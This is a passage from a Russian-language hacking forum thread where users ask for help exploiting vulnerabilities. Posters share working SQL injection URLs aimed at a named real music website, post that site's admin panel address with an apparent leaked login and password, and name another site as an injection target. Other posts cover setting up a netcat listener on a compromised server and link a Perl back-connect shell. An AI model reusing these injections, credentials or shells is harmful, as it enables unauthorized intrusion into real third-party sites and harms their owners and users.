Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Дирижабль

    Дирижабль [ ✯✯✯ Ядерный Суицид ✯✯✯ ]

    Joined:
    6 Jan 2010
    Messages:
    369
    Likes Received:
    346
    Reputations:
    292
    тебе не как..
     
  2. IceJOKER

    IceJOKER Banned

    Joined:
    19 Mar 2010
    Messages:
    9
    Likes Received:
    0
    Reputations:
    0
    Нашел SQL inj, но никак не смог вытащит что-то. Кто поможет? Читал темы тут, но никак не смог. В ГЕТ параметре не фильтруется ид.
    Еще, нашел на несколькиx сайтаx раскрытие путей, а что можно сними сделать?
    И как найти php inclue ?

    Подробно объясните,please...
     
  3. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    тынц
     
  4. IceJOKER

    IceJOKER Banned

    Joined:
    19 Mar 2010
    Messages:
    9
    Likes Received:
    0
    Reputations:
    0
    ТЫНЦ не помогло, вот сайт где скул inj. http://dag-auto.ru/userauto.php?PHPSESSID=LALALA&start=1blabla
     
  5. IMMORTAL_S

    IMMORTAL_S Member

    Joined:
    29 Apr 2010
    Messages:
    129
    Likes Received:
    9
    Reputations:
    2
    Пытаюсь на сервере прослушать порт netcat'ом, но ничё не получается оО... выдает:
    Code:
    > nc -l -p 31337
    usage: nc [-46DdhklnrStUuvzC] [-i interval] [-p source_port]
    	  [-s source_ip_address] [-T ToS] [-w timeout] [-X proxy_version]
    	  [-x proxy_address[:port]] [hostname] [port[s]]
    Хотя я и могу запустить бинд на перле, но хочу понять как это сделать netcat'ом.
     
  6. IMMORTAL_S

    IMMORTAL_S Member

    Joined:
    29 Apr 2010
    Messages:
    129
    Likes Received:
    9
    Reputations:
    2
    Еще вопрос:
    Соединяюсь с сервером чз netcat, потом ввожу команду ssh 123.123.123.123, в ответ приходит следующая надпись
    Code:
    Pseudo-terminal will not be allocated because stdin is not a terminal
    Что есть этот самый терминал..? где можно почитать про это?
     
  7. kfor

    kfor Elder - Старейшина

    Joined:
    1 Sep 2005
    Messages:
    278
    Likes Received:
    48
    Reputations:
    29

    Это означает, что тебе нужен бекконект который привязывется к терминалу. Вот держи залил тебе на перле http://www.sendspace.com/file/tsb30y
     
    1 person likes this.
  8. IMMORTAL_S

    IMMORTAL_S Member

    Joined:
    29 Apr 2010
    Messages:
    129
    Likes Received:
    9
    Reputations:
    2
    Как им правильно пользоваться?
    Выдает:
    Code:
    ERROR: No more pty's avaliable
    P.S. Может у кого есть ttyX, что-то нигде не нашел.
     
    #14328 IMMORTAL_S, 1 Aug 2010
    Last edited: 1 Aug 2010
  9. Electr0n

    Electr0n Active Member

    Joined:
    19 Aug 2009
    Messages:
    0
    Likes Received:
    164
    Reputations:
    0
    информация о табицах не доступна...
    возможен просмотр?

    Code:
    http://www.drummersworld.com/dsp/category.php?id=e90a535886a467144e56b47de5e563b3&catname=Cymbals&catid=-147+union+select+1,2,3,4,5,6,7,8,9,10,database(),12,13,14,15,16,17,18,19,20,21,22--
     
  10. AKYLA

    AKYLA Elder - Старейшина

    Joined:
    29 Nov 2007
    Messages:
    108
    Likes Received:
    35
    Reputations:
    6
    Electr0n там видимо фильтр на выуживание таблиц, потому что если методом подбора подобрать допустим таблицу users, то поля можно свободно получить, без брута
    Вот тебе админка:
    http://www.drummersworld.com/dsp/admin/admin.php
    technology
    fuckwhohackthisshop
     
    #14330 AKYLA, 1 Aug 2010
    Last edited: 1 Aug 2010
  11. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    http://www.drummersworld.com/dsp/category.php?id=e90a535886a467144e56b47de5e563b3&catname=Cymbals&catid=-147+union+select+1,2,3,4,5,6,7,8,9,10,column_name,12,13,14,15,16,17,18,19,20,21,22+from+information_schema.columns+where+table_name=0x7573657273+--+
     
  12. Burderator

    Burderator New Member

    Joined:
    7 Jul 2010
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    Нашёл скулу
    Что возможно с ней сделать?
     
  13. Seravin

    Seravin Active Member

    Joined:
    25 Nov 2009
    Messages:
    475
    Likes Received:
    190
    Reputations:
    221
    инъекция в лимите, читать
     
  14. Burderator

    Burderator New Member

    Joined:
    7 Jul 2010
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    линк что читать =) многое перечитал
     
  15. Seravin

    Seravin Active Member

    Joined:
    25 Nov 2009
    Messages:
    475
    Likes Received:
    190
    Reputations:
    221
    кароч есть гугл для этого) я нагуглил и ты нагуглишь
     
  16. Burderator

    Burderator New Member

    Joined:
    7 Jul 2010
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    думаешь не искал?) подсказку хотябы...
     
  17. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    подсказка

    http://www.google.ru/search?hl=ru&source=hp&q=sql+%D0%B8%D0%BD%D1%8A%D0%B5%D0%BA%D1%86%D0%B8%D1%8F+%D0%B2+%D0%BB%D0%B8%D0%BC%D0%B8%D1%82%D0%B5&aq=f&aqi=&aql=&oq=&gs_rfai=
     
  18. Burderator

    Burderator New Member

    Joined:
    7 Jul 2010
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    sql инъекци%D 1Џ РІ лимите криво выводиться запрос на поиск =/
     
  19. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    млядь sql инъекция в лимите .... сложно понять и в гугл вбить?
     
  20. Burderator

    Burderator New Member

    Joined:
    7 Jul 2010
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    Да искал,до гугла сюда бы не написал
     
Thread Status:
Not open for further replies.